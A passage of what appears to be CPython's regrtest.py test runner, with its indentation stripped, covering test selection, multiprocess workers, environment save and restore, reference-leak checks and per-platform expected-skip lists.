next_test = fp.read().strip()
tests = [next_test]
fp.close()
except IOError:
pass
if fromfile:
tests = []
fp = open(os.path.join(support.SAVEDCWD, fromfile))
count_pat = re.compile(r'\[\s*\d+/\s*\d+\]')
for line in fp:
line = count_pat.sub('', line)
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
fp.close()
# Strip .py extensions.
removepy(args)
removepy(tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS.copy()
if exclude:
for arg in args:
if arg in stdtests:
stdtests.remove(arg)
nottests.add(arg)
args = []
# For a partial run, we do not need to clutter the output.
if verbose or header or not (quiet or single != 1 or tests or args):
# Print basic platform information
print("==", platform.python_implementation(), *sys.version.split())
print("== ", platform.platform(aliased=True),
"%s-endian" % sys.byteorder)
print("== ", os.getcwd())
print("Testing with flags:", sys.flags)
# if testdir is set, then we are not running the python tests suite, so
# don't add default tests to be executed or skipped (pass empty values)
if testdir:
alltests = findtests(testdir, list(), set())
else:
alltests = findtests(testdir, stdtests, nottests)
selected = tests or args or alltests
if single:
first_selected = selected[0]
index_selected = alltests.index(first_selected)
if index_selected + single > len(alltests):
single = len(alltests) - index_selected
selected = alltests[index_selected:index_selected+single]
try:
next_single_test = alltests[index_selected+single]
except IndexError:
next_single_test = None
# Remove all the selected tests that precede start if it's set.
if start:
try:
del selected[:selected.index(start)]
except ValueError:
print("Couldn't find starting test (%s), using all tests" % start)
if randomize:
random.seed(random_seed)
print("Using random seed", random_seed)
random.shuffle(selected)
if trace:
import trace, tempfile
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,
tempfile.gettempdir()],
trace=False, count=True)
test_times = []
support.verbose = verbose # Tell tests to be moderately quiet
support.use_resources = use_resources
save_modules = sys.modules.keys()
def accumulate_result(test, result):
ok, test_time = result
test_times.append((test_time, test))
if ok == PASSED:
good.append(test)
elif ok == FAILED:
bad.append(test)
elif ok == ENV_CHANGED:
environment_changed.append(test)
elif ok == SKIPPED:
skipped.append(test)
elif ok == RESOURCE_DENIED:
skipped.append(test)
resource_denieds.append(test)
if forever:
def test_forever(tests=list(selected)):
while True:
for test in tests:
yield test
if bad:
return
tests = test_forever()
test_count = ''
test_count_width = 3
else:
tests = iter(selected)
test_count = '/{}'.format(len(selected))
test_count_width = len(test_count) - 1
if use_mp:
try:
from threading import Thread
except ImportError:
print("Multiprocess option requires thread support")
sys.exit(2)
from queue import Queue
from subprocess import Popen, PIPE
debug_output_pat = re.compile(r"\[\d+ refs\]$")
output = Queue()
pending = MultiprocessTests(tests)
opt_args = support.args_from_interpreter_flags()
base_cmd = [sys.executable] + opt_args + ['-m', 'test.regrtest']
def work():
# A worker thread.
try:
while True:
try:
test = next(pending)
except StopIteration:
output.put((None, None, None, None))
return
args_tuple = (
(test, verbose, quiet),
dict(huntrleaks=huntrleaks, use_resources=use_resources,
debug=debug, output_on_failure=verbose3,
timeout=timeout, failfast=failfast,
match_tests=match_tests)
)
# -E is needed by some tests, e.g. test_import
# Running the child from the same working directory ensures
# that TEMPDIR for the child is the same when
# sysconfig.is_python_build() is true. See issue 15300.
popen = Popen(base_cmd + ['--slaveargs', json.dumps(args_tuple)],
stdout=PIPE, stderr=PIPE,
universal_newlines=True,
close_fds=(os.name != 'nt'),
cwd=support.SAVEDCWD)
stdout, stderr = popen.communicate()
retcode = popen.wait()
# Strip last refcount output line if it exists, since it
# comes from the shutdown of the interpreter in the subcommand.
stderr = debug_output_pat.sub("", stderr)
stdout, _, result = stdout.strip().rpartition("\n")
if retcode != 0:
result = (CHILD_ERROR, "Exit code %s" % retcode)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
return
if not result:
output.put((None, None, None, None))
return
result = json.loads(result)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
except BaseException:
output.put((None, None, None, None))
raise
workers = [Thread(target=work) for i in range(use_mp)]
for worker in workers:
worker.start()
finished = 0
test_index = 1
try:
while finished < use_mp:
test, stdout, stderr, result = output.get()
if test is None:
finished += 1
continue
accumulate_result(test, result)
if not quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count,
len(bad), test))
if stdout:
print(stdout)
if stderr:
print(stderr, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
if result[0] == INTERRUPTED:
raise KeyboardInterrupt
if result[0] == CHILD_ERROR:
raise Exception("Child error on {}: {}".format(test, result[1]))
test_index += 1
except KeyboardInterrupt:
interrupted = True
pending.interrupted = True
for worker in workers:
worker.join()
else:
for test_index, test in enumerate(tests, 1):
if not quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count, len(bad), test))
sys.stdout.flush()
if trace:
# If we're tracing code coverage, then we don't exit with status
# if on a false return value from main.
tracer.runctx('runtest(test, verbose, quiet, timeout=timeout)',
globals=globals(), locals=vars())
else:
try:
result = runtest(test, verbose, quiet, huntrleaks, debug,
output_on_failure=verbose3,
timeout=timeout, failfast=failfast,
match_tests=match_tests)
accumulate_result(test, result)
except KeyboardInterrupt:
interrupted = True
break
except:
raise
if findleaks:
gc.collect()
if gc.garbage:
print("Warning: test created", len(gc.garbage), end=' ')
print("uncollectable object(s).")
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
support.unload(module)
if interrupted:
# print a newline after ^C
print()
print("Test suite interrupted by signal SIGINT.")
omitted = set(selected) - set(good) - set(bad) - set(skipped)
print(count(len(omitted), "test"), "omitted:")
printlist(omitted)
if good and not quiet:
if not bad and not skipped and not interrupted and len(good) > 1:
print("All", end=' ')
print(count(len(good), "test"), "OK.")
if print_slow:
test_times.sort(reverse=True)
print("10 slowest tests:")
for time, test in test_times[:10]:
print("%s: %.1fs" % (test, time))
if bad:
bad = sorted(set(bad) - set(environment_changed))
if bad:
print(count(len(bad), "test"), "failed:")
printlist(bad)
if environment_changed:
print("{} altered the execution environment:".format(
count(len(environment_changed), "test")))
printlist(environment_changed)
if skipped and not quiet:
print(count(len(skipped), "test"), "skipped:")
printlist(skipped)
e = _ExpectedSkips()
plat = sys.platform
if e.isvalid():
surprise = set(skipped) - e.getexpected() - set(resource_denieds)
if surprise:
print(count(len(surprise), "skip"), \
"unexpected on", plat + ":")
printlist(surprise)
else:
print("Those skips are all expected on", plat + ".")
else:
print("Ask someone to teach regrtest.py about which tests are")
print("expected to get skipped on", plat + ".")
if verbose2 and bad:
print("Re-running failed tests in verbose mode")
for test in bad:
print("Re-running test %r in verbose mode" % test)
sys.stdout.flush()
try:
verbose = True
ok = runtest(test, True, quiet, huntrleaks, debug, timeout=timeout)
except KeyboardInterrupt:
# print a newline separate from the ^C
print()
break
except:
raise
if single:
if next_single_test:
with open(filename, 'w') as fp:
fp.write(next_single_test + '\n')
else:
os.unlink(filename)
if trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=coverdir)
if runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0 or interrupted)
# small set of tests to determine if we have a basically functioning interpreter
# (i.e. if any of these fail, then anything else is likely to follow)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_dict',
'test_builtin',
'test_exceptions',
'test_types',
'test_unittest',
'test_doctest',
'test_doctest2',
'test_support'
]
# set of tests that we don't want to be executed when using regrtest
NOTTESTS = set()
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
testdir = findtestdir(testdir)
names = os.listdir(testdir)
tests = []
others = set(stdtests) | nottests
for name in names:
mod, ext = os.path.splitext(name)
if mod[:5] == "test_" and ext in (".py", "") and mod not in others:
tests.append(mod)
return stdtests + sorted(tests)
# We do not use a generator so multiple threads can call next().
class MultiprocessTests(object):
"""A thread-safe iterator over tests for multiprocess mode."""
def __init__(self, tests):
self.interrupted = False
self.lock = threading.Lock()
self.tests = tests
def __iter__(self):
return self
def __next__(self):
with self.lock:
if self.interrupted:
raise StopIteration('tests interrupted')
return next(self.tests)
def replace_stdout():
"""Set stdout encoder error handler to backslashreplace (as stderr error
handler) to avoid UnicodeEncodeError when printing a traceback"""
import atexit
stdout = sys.stdout
sys.stdout = open(stdout.fileno(), 'w',
encoding=stdout.encoding,
errors="backslashreplace",
closefd=False,
newline='\n')
def restore_stdout():
sys.stdout.close()
sys.stdout = stdout
atexit.register(restore_stdout)
def runtest(test, verbose, quiet,
huntrleaks=False, debug=False, use_resources=None,
output_on_failure=False, failfast=False, match_tests=None,
timeout=None):
"""Run a single test.
test -- the name of the test
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
test_times -- a list of (time, test_name) pairs
huntrleaks -- run multiple times to test for leaks; requires a debug
build; a triple corresponding to -R's three arguments
output_on_failure -- if true, display test output on failure
timeout -- dump the traceback and exit if a test takes more than
timeout seconds
Returns one of the test result constants:
INTERRUPTED KeyboardInterrupt when run under -j
RESOURCE_DENIED test skipped because resource denied
SKIPPED test skipped for some other reason
ENV_CHANGED test failed because it changed the execution environment
FAILED test failed
PASSED test passed
"""
if use_resources is not None:
support.use_resources = use_resources
use_timeout = (timeout is not None)
if use_timeout:
faulthandler.dump_tracebacks_later(timeout, exit=True)
try:
support.match_tests = match_tests
if failfast:
support.failfast = True
if output_on_failure:
support.verbose = True
# Reuse the same instance to all calls to runtest(). Some
# tests keep a reference to sys.stdout or sys.stderr
# (eg. test_argparse).
if runtest.stringio is None:
stream = io.StringIO()
runtest.stringio = stream
else:
stream = runtest.stringio
stream.seek(0)
stream.truncate()
orig_stdout = sys.stdout
orig_stderr = sys.stderr
try:
sys.stdout = stream
sys.stderr = stream
result = runtest_inner(test, verbose, quiet, huntrleaks,
debug, display_failure=False)
if result[0] == FAILED:
output = stream.getvalue()
orig_stderr.write(output)
orig_stderr.flush()
finally:
sys.stdout = orig_stdout
sys.stderr = orig_stderr
else:
support.verbose = verbose # Tell tests to be moderately quiet
result = runtest_inner(test, verbose, quiet, huntrleaks, debug,
display_failure=not verbose)
return result
finally:
if use_timeout:
faulthandler.cancel_dump_tracebacks_later()
cleanup_test_droppings(test, verbose)
runtest.stringio = None
# Unit tests are supposed to leave the execution environment unchanged
# once they complete. But sometimes tests have bugs, especially when
# tests fail, and the changes to environment go on to mess up other
# tests. This can cause issues with buildbot stability, since tests
# are run in random order and so problems may appear to come and go.
# There are a few things we can save and restore to mitigate this, and
# the following context manager handles this task.
class saved_test_environment:
"""Save bits of the test environment and restore them at block exit.
with saved_test_environment(testname, verbose, quiet):
#stuff
Unless quiet is True, a warning is printed to stderr if any of
the saved items was changed by the test. The attribute 'changed'
is initially False, but is set to True if a change is detected.
If verbose is more than 1, the before and after state of changed
items is also printed.
"""
changed = False
def __init__(self, testname, verbose=0, quiet=False):
self.testname = testname
self.verbose = verbose
self.quiet = quiet
# To add things to save and restore, add a name XXX to the resources list
# and add corresponding get_XXX/restore_XXX functions. get_XXX should
# return the value to be saved and compared against a second call to the
# get function when test execution completes. restore_XXX should accept
# the saved value and restore the resource using it. It will be called if
# and only if a change in the value is detected.
#
# Note: XXX will have any '.' replaced with '_' characters when determining
# the corresponding method names.
resources = ('sys.argv', 'cwd', 'sys.stdin', 'sys.stdout', 'sys.stderr',
'os.environ', 'sys.path', 'sys.path_hooks', '__import__',
'warnings.filters', 'asyncore.socket_map',
'logging._handlers', 'logging._handlerList', 'sys.gettrace',
'sys.warnoptions', 'threading._dangling',
'multiprocessing.process._dangling',
'sysconfig._CONFIG_VARS', 'sysconfig._INSTALL_SCHEMES',
'support.TESTFN',
)
def get_sys_argv(self):
return id(sys.argv), sys.argv, sys.argv[:]
def restore_sys_argv(self, saved_argv):
sys.argv = saved_argv[1]
sys.argv[:] = saved_argv[2]
def get_cwd(self):
return os.getcwd()
def restore_cwd(self, saved_cwd):
os.chdir(saved_cwd)
def get_sys_stdout(self):
return sys.stdout
def restore_sys_stdout(self, saved_stdout):
sys.stdout = saved_stdout
def get_sys_stderr(self):
return sys.stderr
def restore_sys_stderr(self, saved_stderr):
sys.stderr = saved_stderr
def get_sys_stdin(self):
return sys.stdin
def restore_sys_stdin(self, saved_stdin):
sys.stdin = saved_stdin
def get_os_environ(self):
return id(os.environ), os.environ, dict(os.environ)
def restore_os_environ(self, saved_environ):
os.environ = saved_environ[1]
os.environ.clear()
os.environ.update(saved_environ[2])
def get_sys_path(self):
return id(sys.path), sys.path, sys.path[:]
def restore_sys_path(self, saved_path):
sys.path = saved_path[1]
sys.path[:] = saved_path[2]
def get_sys_path_hooks(self):
return id(sys.path_hooks), sys.path_hooks, sys.path_hooks[:]
def restore_sys_path_hooks(self, saved_hooks):
sys.path_hooks = saved_hooks[1]
sys.path_hooks[:] = saved_hooks[2]
def get_sys_gettrace(self):
return sys.gettrace()
def restore_sys_gettrace(self, trace_fxn):
sys.settrace(trace_fxn)
def get___import__(self):
return builtins.__import__
def restore___import__(self, import_):
builtins.__import__ = import_
def get_warnings_filters(self):
return id(warnings.filters), warnings.filters, warnings.filters[:]
def restore_warnings_filters(self, saved_filters):
warnings.filters = saved_filters[1]
warnings.filters[:] = saved_filters[2]
def get_asyncore_socket_map(self):
asyncore = sys.modules.get('asyncore')
# XXX Making a copy keeps objects alive until __exit__ gets called.
return asyncore and asyncore.socket_map.copy() or {}
def restore_asyncore_socket_map(self, saved_map):
asyncore = sys.modules.get('asyncore')
if asyncore is not None:
asyncore.close_all(ignore_all=True)
asyncore.socket_map.update(saved_map)
def get_shutil_archive_formats(self):
# we could call get_archives_formats() but that only returns the
# registry keys; we want to check the values too (the functions that
# are registered)
return shutil._ARCHIVE_FORMATS, shutil._ARCHIVE_FORMATS.copy()
def restore_shutil_archive_formats(self, saved):
shutil._ARCHIVE_FORMATS = saved[0]
shutil._ARCHIVE_FORMATS.clear()
shutil._ARCHIVE_FORMATS.update(saved[1])
def get_shutil_unpack_formats(self):
return shutil._UNPACK_FORMATS, shutil._UNPACK_FORMATS.copy()
def restore_shutil_unpack_formats(self, saved):
shutil._UNPACK_FORMATS = saved[0]
shutil._UNPACK_FORMATS.clear()
shutil._UNPACK_FORMATS.update(saved[1])
def get_logging__handlers(self):
# _handlers is a WeakValueDictionary
return id(logging._handlers), logging._handlers, logging._handlers.copy()
def restore_logging__handlers(self, saved_handlers):
# Can't easily revert the logging state
pass
def get_logging__handlerList(self):
# _handlerList is a list of weakrefs to handlers
return id(logging._handlerList), logging._handlerList, logging._handlerList[:]
def restore_logging__handlerList(self, saved_handlerList):
# Can't easily revert the logging state
pass
def get_sys_warnoptions(self):
return id(sys.warnoptions), sys.warnoptions, sys.warnoptions[:]
def restore_sys_warnoptions(self, saved_options):
sys.warnoptions = saved_options[1]
sys.warnoptions[:] = saved_options[2]
# Controlling dangling references to Thread objects can make it easier
# to track reference leaks.
def get_threading__dangling(self):
if not threading:
return None
# This copies the weakrefs without making any strong reference
return threading._dangling.copy()
def restore_threading__dangling(self, saved):
if not threading:
return
threading._dangling.clear()
threading._dangling.update(saved)
# Same for Process objects
def get_multiprocessing_process__dangling(self):
if not multiprocessing:
return None
# This copies the weakrefs without making any strong reference
return multiprocessing.process._dangling.copy()
def restore_multiprocessing_process__dangling(self, saved):
if not multiprocessing:
return
multiprocessing.process._dangling.clear()
multiprocessing.process._dangling.update(saved)
def get_sysconfig__CONFIG_VARS(self):
# make sure the dict is initialized
sysconfig.get_config_var('prefix')
return (id(sysconfig._CONFIG_VARS), sysconfig._CONFIG_VARS,
dict(sysconfig._CONFIG_VARS))
def restore_sysconfig__CONFIG_VARS(self, saved):
sysconfig._CONFIG_VARS = saved[1]
sysconfig._CONFIG_VARS.clear()
sysconfig._CONFIG_VARS.update(saved[2])
def get_sysconfig__INSTALL_SCHEMES(self):
return (id(sysconfig._INSTALL_SCHEMES), sysconfig._INSTALL_SCHEMES,
sysconfig._INSTALL_SCHEMES.copy())
def restore_sysconfig__INSTALL_SCHEMES(self, saved):
sysconfig._INSTALL_SCHEMES = saved[1]
sysconfig._INSTALL_SCHEMES.clear()
sysconfig._INSTALL_SCHEMES.update(saved[2])
def get_support_TESTFN(self):
if os.path.isfile(support.TESTFN):
result = 'f'
elif os.path.isdir(support.TESTFN):
result = 'd'
else:
result = None
return result
def restore_support_TESTFN(self, saved_value):
if saved_value is None:
if os.path.isfile(support.TESTFN):
os.unlink(support.TESTFN)
elif os.path.isdir(support.TESTFN):
shutil.rmtree(support.TESTFN)
def resource_info(self):
for name in self.resources:
method_suffix = name.replace('.', '_')
get_name = 'get_' + method_suffix
restore_name = 'restore_' + method_suffix
yield name, getattr(self, get_name), getattr(self, restore_name)
def __enter__(self):
self.saved_values = dict((name, get()) for name, get, restore
in self.resource_info())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
saved_values = self.saved_values
del self.saved_values
for name, get, restore in self.resource_info():
current = get()
original = saved_values.pop(name)
# Check for changes to the resource's value
if current != original:
self.changed = True
restore(original)
if not self.quiet:
print("Warning -- {} was modified by {}".format(
name, self.testname),
file=sys.stderr)
if self.verbose > 1:
print(" Before: {}\n After: {} ".format(
original, current),
file=sys.stderr)
return False
def runtest_inner(test, verbose, quiet,
huntrleaks=False, debug=False, display_failure=True):
support.unload(test)
test_time = 0.0
refleak = False # True if the test leaked references.
try:
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
with saved_test_environment(test, verbose, quiet) as environment:
start_time = time.time()
the_package = __import__(abstest, globals(), locals(), [])
the_module = getattr(the_package, test)
# If the test has a test_main, that will run the appropriate
# tests. If not, use normal unittest test loading.
test_runner = getattr(the_module, "test_main", None)
if test_runner is None:
tests = unittest.TestLoader().loadTestsFromModule(the_module)
test_runner = lambda: support.run_unittest(tests)
test_runner()
if huntrleaks:
refleak = dash_R(the_module, test, test_runner,
huntrleaks)
test_time = time.time() - start_time
except support.ResourceDenied as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return RESOURCE_DENIED, test_time
except unittest.SkipTest as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return SKIPPED, test_time
except KeyboardInterrupt:
raise
except support.TestFailed as msg:
if display_failure:
print("test", test, "failed --", msg, file=sys.stderr)
else:
print("test", test, "failed", file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
except:
msg = traceback.format_exc()
print("test", test, "crashed --", msg, file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
else:
if refleak:
return FAILED, test_time
if environment.changed:
return ENV_CHANGED, test_time
return PASSED, test_time
def cleanup_test_droppings(testname, verbose):
import shutil
import stat
import gc
# First kill any dangling references to open files etc.
# This can also issue some ResourceWarnings which would otherwise get
# triggered during the following test run, and possibly produce failures.
gc.collect()
# Try to clean up junk commonly left behind. While tests shouldn't leave
# any files or directories behind, when a test fails that can be tedious
# for it to arrange. The consequences can be especially nasty on Windows,
# since if a test leaves a file open, it cannot be deleted by name (while
# there's nothing we can do about that here either, we can display the
# name of the offending test, which is a real help).
for name in (support.TESTFN,
"db_home",
):
if not os.path.exists(name):
continue
if os.path.isdir(name):
kind, nuker = "directory", shutil.rmtree
elif os.path.isfile(name):
kind, nuker = "file", os.unlink
else:
raise SystemError("os.path says %r exists but is neither "
"directory nor file" % name)
if verbose:
print("%r left behind %s %r" % (testname, kind, name))
try:
# if we have chmod, fix possible permissions problems
# that might prevent cleanup
if (hasattr(os, 'chmod')):
os.chmod(name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
nuker(name)
except Exception as msg:
print(("%r left behind %s %r and it couldn't be "
"removed: %s" % (testname, kind, name, msg)), file=sys.stderr)
def dash_R(the_module, test, indirect_test, huntrleaks):
"""Run a test multiple times, looking for reference leaks.
Returns:
False if the test didn't leak references; True if we detected refleaks.
"""
# This code is hackish and inelegant, but it seems to do the job.
import copyreg
import collections.abc
if not hasattr(sys, 'gettotalrefcount'):
raise Exception("Tracking reference leaks requires a debug build "
"of Python")
# Save current values for dash_R_cleanup() to restore.
fs = warnings.filters[:]
ps = copyreg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
try:
import zipimport
except ImportError:
zdc = None # Run unmodified on platforms without zipimport support
else:
zdc = zipimport._zip_directory_cache.copy()
abcs = {}
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
abcs[obj] = obj._abc_registry.copy()
if indirect_test:
def run_the_test():
indirect_test()
else:
def run_the_test():
del sys.modules[the_module.__name__]
exec('import ' + the_module.__name__)
deltas = []
nwarmup, ntracked, fname = huntrleaks
fname = os.path.join(support.SAVEDCWD, fname)
repcount = nwarmup + ntracked
print("beginning", repcount, "repetitions", file=sys.stderr)
print(("1234567890"*(repcount//10 + 1))[:repcount], file=sys.stderr)
sys.stderr.flush()
dash_R_cleanup(fs, ps, pic, zdc, abcs)
for i in range(repcount):
rc_before = sys.gettotalrefcount()
run_the_test()
sys.stderr.write('.')
sys.stderr.flush()
dash_R_cleanup(fs, ps, pic, zdc, abcs)
rc_after = sys.gettotalrefcount()
if i >= nwarmup:
deltas.append(rc_after - rc_before)
print(file=sys.stderr)
if any(deltas):
msg = '%s leaked %s references, sum=%s' % (test, deltas, sum(deltas))
print(msg, file=sys.stderr)
sys.stderr.flush()
with open(fname, "a") as refrep:
print(msg, file=refrep)
refrep.flush()
return True
return False
def dash_R_cleanup(fs, ps, pic, zdc, abcs):
import gc, copyreg
import _strptime, linecache
import urllib.parse, urllib.request, mimetypes, doctest
import struct, filecmp, collections.abc
from distutils.dir_util import _path_created
from weakref import WeakSet
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Restore some original values.
warnings.filters[:] = fs
copyreg.dispatch_table.clear()
copyreg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
try:
import zipimport
except ImportError:
pass # Run unmodified on platforms without zipimport support
else:
zipimport._zip_directory_cache.clear()
zipimport._zip_directory_cache.update(zdc)
# clear type cache
sys._clear_type_cache()
# Clear ABC registries, restoring previously saved ABC registries.
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
obj._abc_registry = abcs.get(obj, WeakSet()).copy()
obj._abc_cache.clear()
obj._abc_negative_cache.clear()
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
_path_created.clear()
re.purge()
_strptime._regex_cache.clear()
urllib.parse.clear_cache()
urllib.request.urlcleanup()
linecache.clearcache()
mimetypes._default_mime_types()
filecmp._cache.clear()
struct._clearcache()
doctest.master = None
try:
import ctypes
except ImportError:
# Don't worry about resetting the cache if ctypes is not supported
pass
else:
ctypes._reset_cache()
# Collect cyclic trash.
gc.collect()
def warm_caches():
# char cache
s = bytes(range(256))
for i in range(256):
s[i:i+1]
# unicode cache
x = [chr(i) for i in range(256)]
# int cache
x = list(range(-5, 257))
def findtestdir(path=None):
return path or os.path.dirname(__file__) or os.curdir
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks))
# Map sys.platform to a string containing the basenames of tests
# expected to be skipped on that platform.
#
# Special cases:
# test_pep277
# The _ExpectedSkips constructor adds this to the set of expected
# skips if not os.path.supports_unicode_filenames.
# test_timeout
# Controlled by test_timeout.skip_expected. Requires the network
# resource and a socket module.
#
# Tests that are expected to be skipped everywhere except on one platform
# are also handled separately.
_expectations = (
('win32',
"""
test__locale
test_crypt
test_curses
test_dbm
test_devpoll
test_fcntl
test_fork1
test_epoll
test_dbm_gnu
test_dbm_ndbm
test_grp
test_ioctl
test_largefile
test_kqueue
test_openpty
test_ossaudiodev
test_pipes
test_poll
test_posix
test_pty
test_pwd
test_resource
test_signal
test_syslog
test_threadsignals
test_wait3
test_wait4
"""),
('linux',
"""
test_curses
test_devpoll
test_largefile
test_kqueue
test_ossaudiodev
"""),
('unixware',
"""
test_epoll
test_largefile
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_sax
test_sundry
"""),
('openunix',
"""
test_epoll
test_largefile
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_sax
test_sundry
"""),
('sco_sv',
"""
test_asynchat
test_fork1
test_epoll
test_gettext
test_largefile
test_locale
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_queue
test_sax
test_sundry
test_thread
test_threaded_import
test_threadedtempfile
test_threading
"""),
('darwin',
"""
test__locale
test_curses
test_devpoll
test_epoll
test_dbm_gnu
test_gdb
test_largefile
test_locale
test_minidom
test_ossaudiodev
test_poll
"""),
('sunos',
"""
test_curses
test_dbm
test_epoll
test_kqueue
test_dbm_gnu
test_gzip
test_openpty
test_zipfile
test_zlib
"""),
('hp-ux',
"""
test_curses
test_epoll
test_dbm_gnu
test_gzip
test_largefile
test_locale
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_sax
test_zipfile
test_zlib
"""),
('cygwin',
"""
test_curses
test_dbm
test_devpoll
test_epoll
test_ioctl
test_kqueue
test_largefile
test_locale
test_ossaudiodev
test_socketserver
"""),
('os2emx',
"""
test_audioop
test_curses
test_epoll
test_kqueue
test_largefile
test_mmap
test_openpty
test_ossaudiodev
test_pty
test_resource
test_signal
"""),
('freebsd',
"""
test_devpoll
test_epoll
test_dbm_gnu
test_locale
test_ossaudiodev
test_pep277
test_pty
test_socketserver
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_timeout
test_urllibnet
test_multiprocessing
"""),
('aix',
"""
test_bz2
test_epoll
test_dbm_gnu
test_gzip
test_kqueue
test_ossaudiodev
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_zipimport
test_zlib
"""),
('openbsd',
"""
test_ctypes
test_devpoll
test_epoll
test_dbm_gnu
test_locale
test_normalization
test_ossaudiodev
test_pep277
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_multiprocessing
"""),
('netbsd',
"""
test_ctypes
test_curses
test_devpoll
test_epoll
test_dbm_gnu
test_locale
test_ossaudiodev
test_pep277
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_multiprocessing
"""),
)
class _ExpectedSkips:
def __init__(self):
import os.path
from test import test_timeout
self.valid = False
expected = None
for item in _expectations:
if sys.platform.startswith(item[0]):
expected = item[1]
break
if expected is not None:
self.expected = set(expected.split())
# These are broken tests, for now skipped on every platform.
# XXX Fix these!
self.expected.add('test_nis')
# expected to be skipped on every platform, even Linux
if not os.path.supports_unicode_filenames:
self.expected.add('test_pep277')
# doctest, profile and cProfile tests fail when the codec for the
# fs encoding isn't built in because PyUnicode_Decode() adds two
# calls into Python.
encs = ("utf-8", "latin-1", "ascii", "mbcs", "utf-16", "utf-32")
if sys.getfilesystemencoding().lower() not in encs:
self.expected.add('test_profile')
self.expected.add('test_cProfile')
self.expected.add('test_doctest')
if test_timeout.skip_expected:
self.expected.add('test_timeout')
if sys.platform != "win32":
# test_sqlite is only reliable on Windows where the library
# is distributed with Python
WIN_ONLY = {"test_unicode_file", "test_winreg",
"test_winsound", "test_startfile",
"test_sqlite", "test_msilib"}
self.expected |= WIN_ONLY
if sys.platform != 'sunos5':
self.expected.add('test_nis')
if support.python_is_optimized():
self.expected.add("test_gdb")
self.valid = True
def isvalid(self):
"Return true iff _ExpectedSkips knows about the current platform."
return self.valid
def getexpected(self):
"""Return set of test names we expect to skip on current platform.
self.isvalid() must be true.
"""
assert self.isvalid()
return self.expected
def _make_temp_dir_for_build(TEMPDIR):
# When tests are run from the Python build directory, it is best practice
# to keep the test files in a subfolder. It eases the cleanup of leftover
# files using command "make distclean".
if sysconfig.is_python_build():
TEMPDIR = os.path.join(sysconfig.get_config_var('srcdir'), 'build')
TEMPDIR = os.path.abspath(TEMPDIR)
try:
os.mkdir(TEMPDIR)
except FileExistsError:
pass
# Define a writable temp dir that will be used as cwd while running
# the tests. The name of the dir includes the pid to allow parallel
# testing (see the -j option).
TESTCWD = 'test_python_{}'.format(os.getpid())
TESTCWD = os.path.join(TEMPDIR, TESTCWD)
return TEMPDIR, TESTCWD
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. Despite
# the elimination of implicit relative imports, this is still needed to
# ensure that submodules of the test package do not inappropriately appear
# as top-level modules even when people (or buildbots!) invoke regrtest.py
# directly instead of using the -m switch
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
# findtestdir() gets the dirname out of __file__, so we have to make it
# absolute before changing the working directory.
# For example __file__ may be relative when running trace or profile.
# See issue #9323.
__file__ = os.path.abspath(__file__)
# sanity check
assert __file__ == os.path.abspath(sys.argv[0])
TEMPDIR, TESTCWD = _make_temp_dir_for_build(TEMPDIR)
# Run the tests in a context manager that temporary changes the CWD to a
# temporary and writable directory. If it's not possible to create or
